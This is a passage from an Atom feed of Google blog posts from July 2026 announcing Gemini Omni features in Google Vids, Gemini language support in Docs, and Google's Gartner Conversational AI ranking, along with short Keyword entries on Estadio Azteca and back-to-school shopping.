/&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Secure verification:&lt;/b&gt; Verify and manage your personal avatar directly within your &lt;a href="https://myaccount.google.com/video-verification" target="_blank"&gt;Google Account&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Seamless integration: &lt;/b&gt;Easily add your personal avatar from the selector in Vids.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Administrative oversight: &lt;/b&gt;Admins can manage or disable this feature through the Admin console.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h4 style="text-align: left;"&gt;A note on language and region availability&lt;/h4&gt;&lt;p&gt;At launch, personal avatars are available in English only for users 18 years and older. They’re not available in the European Economic Area, Switzerland, or the United Kingdom. Learn more about personal avatar &lt;a href="https://support.google.com/accounts/answer/17100665?visit_id=639190374851512632-1124942400&amp;amp;p=msa_privacy&amp;amp;rd=1#privacy" target="_blank"&gt;privacy settings&lt;/a&gt;.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins: &lt;/b&gt;This feature will be ON by default and can be disabled or enabled at the domain level. Visit the Help Center to &lt;a href="https://knowledge.workspace.google.com/admin/users/access/turn-vids-on-or-off-for-users#manage_personal_avatars_in_vids" target="_blank"&gt;learn more about managing personal avatars in Vids&lt;/a&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users: &lt;/b&gt;Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/16970930" target="_blank"&gt;learn more about using personal avatars in Vids&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on July 16, 2026&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on August 5, 2026&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business: &lt;/b&gt;Business Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions:&lt;/b&gt; Enterprise Essentials and Enterprise Essentials Plus; Nonprofits&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Google AI Pro for Education; Teaching and Learning&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;i&gt;*Users with AI Expanded Access add-on licenses have &lt;a href="https://support.google.com/a/answer/14700766" target="_blank"&gt;higher limits&lt;/a&gt; on usage of Omni in Vids.&lt;/i&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/16970930" target="_blank"&gt;Create, use &amp;amp; manage your personal avatar with Gemini in Google Vids&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Docs Editors Help: &lt;a href="https://support.google.com/docs/answer/16143507" target="_blank"&gt;Use Omni in Google Vids&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/cast-yourself-in-ai-video-clips-using-your-personal-avatar-with-Gemini-Omni-in-Vids.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-16T20:06:53+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeIquZqGygFpCGeo8dOUArA4Hb2K8-9KiKRrSrKiNmb8cMT2Th4VemOsnJSHvvE72c_PoPoVZj-89hlds8sfiVa8759ZYz5bEYgjngBMha0u66Y8d4tkwnjlKvG19Ppu1d0u0J0QB2aDMs5w3WJZSgPg8UylT5_30RU1ASLwvKXVmGlt6v9exwLDfq9c/s72-c/Cast%20yourself%20in%20AI%20video%20clips%20using%20your%20personal%20avatar%20with%20Gemini%20Omni%20in%20Vids%20-%206736.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeIquZqGygFpCGeo8dOUArA4Hb2K8-9KiKRrSrKiNmb8cMT2Th4VemOsnJSHvvE72c_PoPoVZj-89hlds8sfiVa8759ZYz5bEYgjngBMha0u66Y8d4tkwnjlKvG19Ppu1d0u0J0QB2aDMs5w3WJZSgPg8UylT5_30RU1ASLwvKXVmGlt6v9exwLDfq9c/s72-c/Cast%20yourself%20in%20AI%20video%20clips%20using%20your%20personal%20avatar%20with%20Gemini%20Omni%20in%20Vids%20-%206736.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhgeIquZqGygFpCGeo8dOUArA4Hb2K8-9KiKRrSrKiNmb8cMT2Th4VemOsnJSHvvE72c_PoPoVZj-89hlds8sfiVa8759ZYz5bEYgjngBMha0u66Y8d4tkwnjlKvG19Ppu1d0u0J0QB2aDMs5w3WJZSgPg8UylT5_30RU1ASLwvKXVmGlt6v9exwLDfq9c/s72-c/Cast%20yourself%20in%20AI%20video%20clips%20using%20your%20personal%20avatar%20with%20Gemini%20Omni%20in%20Vids%20-%206736.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/generate-higher-quality-ai-video-clips-and-edit-any-video-with-Gemini-Omni-in-Vids.html</id>
    <title>Generate higher quality AI video clips and edit any video with Gemini Omni in Vids</title>
    <updated>2026-07-16T19:09:09+00:00</updated>
    <content type="html">&lt;p&gt;Users now have access to Gemini Omni directly within &lt;a href="https://docs.google.com/videos/create?usp=blog" target="_blank"&gt;Google Vids&lt;/a&gt;. Omni provides higher quality video generation with significant improvements over previous models. Additionally, Omni’s world understanding unlocks simple video edits so you can ask Omni to tweak the video you have to get the video you need.&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYR7JnqBXKK14fpEIXgbY3_L4HKT9gDaPhBGyy-5h7Ye7kCQ-ph6OZ10JIFUn98a_YSXh12IinIKMIS_iaEv31z3o5463pooO2jUMaKkgkHv4KiD_s2YYMCJBAU6XDIG5iO4ZkLZ1yLSvzJO3QvYfLXB523dxLbe7QbcEtZtza3MdiR1dd2ViPqffLO7g/s1660/Generate%20higher%20quality%20AI%20video%20clips%20and%20edit%20any%20video%20with%20Gemini%20Omni%20in%20Vids%20-%207022.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYR7JnqBXKK14fpEIXgbY3_L4HKT9gDaPhBGyy-5h7Ye7kCQ-ph6OZ10JIFUn98a_YSXh12IinIKMIS_iaEv31z3o5463pooO2jUMaKkgkHv4KiD_s2YYMCJBAU6XDIG5iO4ZkLZ1yLSvzJO3QvYfLXB523dxLbe7QbcEtZtza3MdiR1dd2ViPqffLO7g/s1600/Generate%20higher%20quality%20AI%20video%20clips%20and%20edit%20any%20video%20with%20Gemini%20Omni%20in%20Vids%20-%207022.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Omni in Vids user experience&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Generate clips with higher quality:&lt;/b&gt; Generate higher quality videos with improved text rendering, physics, and realism using Google’s latest Omni Flash model.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Edit videos by typing changes:&lt;/b&gt; For example, fix the color-grading, restyle the visuals in anime, or remove that New York siren in the background with a simple text instruction in Vids.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h4 style="text-align: left;"&gt;A note on language and region availability&lt;/h4&gt;&lt;p&gt;At launch, editing non-AI videos with Omni is not available in the European Economic Area, Switzerland, United Kingdom, Texas, or Illinois.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Getting started&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Admins:&lt;/b&gt; This feature does not have an admin control.&lt;/li&gt;&lt;li&gt;&lt;b&gt;End users:&lt;/b&gt; Visit the Help Center to &lt;a href="https://support.google.com/docs/answer/16143507" target="_blank"&gt;learn more about using Omni in Vids&lt;/a&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Rollout pace&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Rapid Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on July 16, 2026&amp;nbsp;&lt;/li&gt;&lt;li&gt;&lt;a href="https://support.google.com/a/answer/172177" target="_blank"&gt;Scheduled Release domains:&lt;/a&gt; Gradual rollout (up to 15 days for feature visibility) starting on August 5, 2026&amp;nbsp;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Availability&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;&lt;b&gt;Business:&lt;/b&gt; Business Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Enterprise: &lt;/b&gt;Enterprise Starter, Standard, and Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education: &lt;/b&gt;Education Plus&lt;/li&gt;&lt;li&gt;&lt;b&gt;Consumer: &lt;/b&gt;Google AI Pro and Ultra&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Editions: &lt;/b&gt;Enterprise Essentials and Enterprise Essentials Plus; Nonprofits&lt;/li&gt;&lt;li&gt;&lt;b&gt;Education Add-ons: &lt;/b&gt;Google AI Pro for Education; Teaching and Learning&lt;/li&gt;&lt;li&gt;&lt;b&gt;Other Add-ons: &lt;/b&gt;AI Expanded Access*&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;*Users with AI Expanded Access add-on licenses have &lt;a href="https://support.google.com/a/answer/14700766" target="_blank"&gt;higher limits&lt;/a&gt; on usage of Omni in Vids.&lt;/p&gt;&lt;h3 style="text-align: left;"&gt;Resources&lt;/h3&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;Google Vids Editors Help: &lt;a href="https://support.google.com/docs/answer/16143507" target="_blank"&gt;Use AI to generate video clips&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;/p&gt;</content>
    <link href="https://workspaceupdates.googleblog.com/2026/07/generate-higher-quality-ai-video-clips-and-edit-any-video-with-Gemini-Omni-in-Vids.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-07-16T19:09:09+00:00</published>
    <media:group>
      <media:content url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYR7JnqBXKK14fpEIXgbY3_L4HKT9gDaPhBGyy-5h7Ye7kCQ-ph6OZ10JIFUn98a_YSXh12IinIKMIS_iaEv31z3o5463pooO2jUMaKkgkHv4KiD_s2YYMCJBAU6XDIG5iO4ZkLZ1yLSvzJO3QvYfLXB523dxLbe7QbcEtZtza3MdiR1dd2ViPqffLO7g/s72-c/Generate%20higher%20quality%20AI%20video%20clips%20and%20edit%20any%20video%20with%20Gemini%20Omni%20in%20Vids%20-%207022.png" type="image/png" medium="image"/>
      <media:thumbnail url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYR7JnqBXKK14fpEIXgbY3_L4HKT9gDaPhBGyy-5h7Ye7kCQ-ph6OZ10JIFUn98a_YSXh12IinIKMIS_iaEv31z3o5463pooO2jUMaKkgkHv4KiD_s2YYMCJBAU6XDIG5iO4ZkLZ1yLSvzJO3QvYfLXB523dxLbe7QbcEtZtza3MdiR1dd2ViPqffLO7g/s72-c/Generate%20higher%20quality%20AI%20video%20clips%20and%20edit%20any%20video%20with%20Gemini%20Omni%20in%20Vids%20-%207022.png"/>
    </media:group>
    <link rel="enclosure" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYR7JnqBXKK14fpEIXgbY3_L4HKT9gDaPhBGyy-5h7Ye7kCQ-ph6OZ10JIFUn98a_YSXh12IinIKMIS_iaEv31z3o5463pooO2jUMaKkgkHv4KiD_s2YYMCJBAU6XDIG5iO4ZkLZ1yLSvzJO3QvYfLXB523dxLbe7QbcEtZtza3MdiR1dd2ViPqffLO7g/s72-c/Generate%20higher%20quality%20AI%20video%20clips%20and%20edit%20any%20video%20with%20Gemini%20Omni%20in%20Vids%20-%207022.png" type="image/png" length="0"/>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/ai-machine-learning/google-is-a-leader-in-the-gartner-magic-quadrant-for-conversational-ai</id>
    <title>Google is a Leader and positioned furthest in Vision and highest in Execution in the 2026 Gartner® Magic Quadrant™ for Conversational AI Platforms</title>
    <updated>2026-07-16T19:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For the second consecutive year, Google has been named a Leader in the Gartner® Magic Quadrant™ for Conversational AI Platforms. Google received the furthest and highest in positioning on the "Vision" and "Execution" axes and is now ranked #1 in three out of four Critical Capabilities Use Cases. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;We believe this recognition reflects our continued investment in frontier AI research, enterprise infrastructure, and helping customers move AI from experimentation into production at scale.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;More importantly, we believe it reflects the success of the organizations building with Gemini Enterprise for Customer Experience every day.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="2026 Gartner Magic Quadrant for Conversational AI Platforms" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/2026_Gartner_Magic_Quadrant_for_Conversati.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 1: Magic Quadrant for Conversational AI Platforms (Image of the Gartner Magic Quadrant for Conversational AI Platforms, showing Google positioned in the "Leaders" quadrant.)&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://cloud.google.com/resources/content/leader-in-conversational-ai-mq"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Download the complimentary 2026 Gartner Magic Quadrant for Conversational AI Platforms&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Building the next generation of customer experiences with Gemini Enterprise for Customer Experience&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Enterprise customer experiences are entering a new era. Organizations are moving beyond traditional chatbots toward AI agents that can understand customer intent, reason across enterprise knowledge, and take action across business systems.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As these experiences move into production, enterprises need more than powerful models. They need an AI platform that combines frontier research with enterprise security, governance, operational reliability, and the ability to scale globally.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Today, Gemini Enterprise for Customer Experience brings these capabilities together to give your customers a frictionless experience. Organizations can deploy agents that eliminate disjointed interactions across voice and digital channels, allowing customers to discover, purchase, and get help across every touchpoint without starting over. This connected journey drives revenue growth, deeper loyalty, and lower operational costs.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Built for production AI&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;At the center of Gemini Enterprise for Customer Experience is CX Agent Studio, Google’s platform for building intelligent customer experience agents. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;By coupling our newest models, unified product capabilities, and updated deployment best practices, we abstract technical complexities so enterprise teams can build at an unprecedented speed and derive true business value.&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Organizations can use &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise-cx/cx-agent-studio?e=0"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CX Agent Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Build multimodal AI agents and deploy them across voice and chat channels,&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Assist human support and service representatives in real time,&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Analyze customer conversations to improve business outcomes,&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;And, accelerate deployment with pre-built agents for industries including retail, food ordering, and automotive.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Modern customer experiences demand more than answering questions. They require AI that can understand complex requests, retrieve trusted information, reason through multiple steps, and take action across enterprise systems. For example, The Home Depot is already using these capabilities for customer support - helping customers reach solutions up to 4x faster than traditional phone menus when calling into a store. AI voice agents built with CX Agent Studio understand why a customer is calling in fewer than 10 seconds to help customers complete purchases, initiate service requests, or seamlessly transition to a human associate when needed.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;“AI does a tremendous job at recognizing customer intent and taking direct action to help complete a purchase or even start a service request. And of course, if they need to speak with an associate, we’ll quickly connect them.” - Jordan Broggi, EVP of Customer Experience and President of Online, The Home Depot&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;CX Agent Studio combines native multimodal capabilities, agent orchestration, enterprise retrieval, and integrated developer tooling to help organizations move quickly from experimentation to production.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Whether deploying pre-built industry agents or building custom experiences, organizations maintain enterprise-grade security, governance, and operational controls while retaining complete ownership of their customer experience.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Powered by Google’s AI optimized stack &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Gemini Enterprise for Customer Experience is built on Gemini models developed by Google DeepMind. But having access to Google DeepMind's world-leading research and frontier models is the starting line. A brilliant model is only as powerful as the foundation it runs on. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;To put human-grade customer experience agents into production - where milliseconds of latency matter for voice interactions and hallucinations pose real business risks - you need a platform engineered for performance.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This is why Gemini Enterprise for Customer Experience and CX Agent Studio run natively on Google Cloud’s complete, first-party AI stack. Spanning from our custom-built AI infrastructure (AI Hypercomputer) and the Agentic Data Cloud that grounds your models in real-time truth, up to the autonomous protection of Agentic Defense, every layer is co-designed to function as a single, unified system on a foundation of uncompromising security. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For enterprise CX leaders, this is your structural edge. Because your agents are built on this unified stack, they automatically benefit from our continuous advancements - absorbing every new DeepMind capability and hardware efficiency we achieve. This deep integration delivers the speed, safety, and cost-efficiency you need, freeing your teams to focus on building the next generation of customer experiences.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong style="vertical-align: baseline;"&gt;Looking ahead&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The next generation of customer experiences won’t simply answer questions. They’ll understand context, reason across enterprise knowledge, collaborate with people, and take meaningful action on behalf of customers.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Our vision is to help organizations build AI agents that are proactive, personalized, and continuously improving across every customer touchpoint.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To download the full 2026 Gartner® Magic Quadrant™ for Conversational AI Platforms report, click &lt;/span&gt;&lt;a href="https://cloud.google.com/resources/content/leader-in-conversational-ai-mq"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. For more information on CX Agent Studio and Gemini Enterprise for Customer Experience, visit &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise-cx?e=48754805&amp;amp;hl=en"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;our website&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;p&gt;&lt;sub&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Gartner, Magic Quadrant for Conversational AI Platforms, Gabriele Rigon, Justin Tung, Arup Roy, Adrian Lee, Uma Challa, July 7, 2026&lt;/span&gt;&lt;/sub&gt;&lt;/p&gt;
&lt;p&gt;&lt;sub&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Gartner, Critical Capabilities for Conversational AI Platforms, Justin Tung, Uma Challa, Adrian Lee, Gabriele Rigon, Arup Roy, July 7, 2026&lt;/span&gt;&lt;/sub&gt;&lt;/p&gt;
&lt;p&gt;&lt;sub&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. This graphic was published by Gartner, Inc. as part of a larger research document and should be evaluated in the context of the entire document. The Gartner document is available upon request from Google.&lt;/span&gt;&lt;/sub&gt;&lt;/p&gt;
&lt;p&gt;&lt;sub&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;GARTNER is a registered trademark and service mark of Gartner, Inc. and/or its affiliates in the U.S. and internationally, and MAGIC QUADRANT is a registered trademark of Gartner, Inc. and/or its affiliates and are used herein with permission. All rights reserved.&lt;/span&gt;&lt;/sub&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/ai-machine-learning/google-is-a-leader-in-the-gartner-magic-quadrant-for-conversational-ai" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-07-16T19:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/earth/estadio-azteca</id>
    <title>Experience the legacy of Estadio Azteca on Google Earth.</title>
    <updated>2026-07-16T19:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Celebrating_the_worlds_first_3-.max-600x600.format-webp.webp" /&gt;Relive 60 years of soccer history at Mexico City’s Aztec Stadium with Google Earth and the ICA Foundation.</content>
    <link href="https://blog.google/products-and-platforms/products/earth/estadio-azteca" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-16T19:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Celebrating_the_worlds_first_3-.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Celebrating_the_worlds_first_3-.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Celebrating_the_worlds_first_3-.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/shopping/back-to-school-trends</id>
    <title>Beach vibes and temporary wallpaper are trending for back-to-school season.</title>
    <updated>2026-07-16T17:00:00+00:00</updated>
    <content type="html">College students are eager to turn their dull dorm rooms into cozy spaces. Here are the Google Search trends we’re seeing.</content>
    <link href="https://blog.google/products-and-platforms/products/shopping/back-to-school-trends" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-16T17:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/shopping/6-back-to-school-shopping-tricks-every-student-should-know</id>
    <title>6 back-to-school shopping tricks every student should know</title>
    <updated>2026-07-16T17:00:00+00:00</updated>
    <content type="html">Four mobile phone screens illustrating Google Shopping features: personalized AI search results, a Google Lens visual search of a shoe, a product listing with a price-tracking button, and a virtual try-on feature showing a shirt on an avatar.</content>
    <link href="https://blog.google/products-and-platforms/products/shopping/6-back-to-school-shopping-tricks-every-student-should-know" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-07-16T17:00:00+00:00</published>
    <media:group>
      <media:content url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Back_to_School_Shopping_Trends_.max-600x600.format-webp.webp" type="image/webp" medium="image"/>
      <media:thumbnail url="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Back_to_School_Shopping_Trends_.max-600x600.format-webp.webp"/>
    </media:group>
    <link rel="enclosure" href="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Back_to_School_Shopping_Trends_.max-600x600.format-webp.webp" type="image/webp" length="0"/>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/07/expanded-language-support-for-gemini-in-Google-Docs.html</id>
    <title>Expanded language support for Gemini in Google Docs</title>
    <updated>2026-07-16T16:46:22+00:00</updated>
    <content type="html">&lt;p&gt;Earlier this year, &lt;a href="https://workspaceupdates.googleblog.com/2026/04/new-gemini-capabilities-in-google-docs-help-you-go-from-blank-page-to-brilliance.html" target="_blank"&gt;we introduced&lt;/a&gt; new Gemini in Google Docs capabilities that help you move from a blank page to a finished document faster than ever.&lt;/p&gt;&lt;p&gt;We are now expanding support for these features to 11 more languages, including Mandarin, Dutch, Malay, Hebrew, Polish, Turkish, Czech, Indonesian, Swedish, Danish, and Norwegian. These new additions join our previously supported languages: English, Spanish, Portuguese, Japanese, French, Korean, German, and Italian.&lt;/p&gt;&lt;h4 style="text-align: left;"&gt;Reimagined Gemini experience in Docs&lt;/h4&gt;&lt;p&gt;With this update, Google Docs offers a centralized place to generate, write, and refine your documents with Gemini. Powered by &lt;a href="https://workspace.google.com/blog/product-announcements/introducing-workspace-intelligence" target="_blank"&gt;Workspace Intelligence&lt;/a&gt;, Gemini leverages data across Drive, Gmail, Chat, and the web to provide personalized, context-aware assistance.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;ul style="text-align: left;"&gt;&lt;li&gt;The upgraded &lt;b&gt;Help me create&lt;/b&gt; experience enables you to generate relevant, fully formatted first drafts that synthesize information from your files, emails, chat, and the web.&lt;/li&gt;&lt;li&gt;With &lt;b&gt;Help me write&lt;/b&gt;, simply prompt Gemini from the bottom bar or side panel to make edits across your doc, or select text to focus Gemini’s attention. Gemini’s suggested edits are only visible to you until you approve 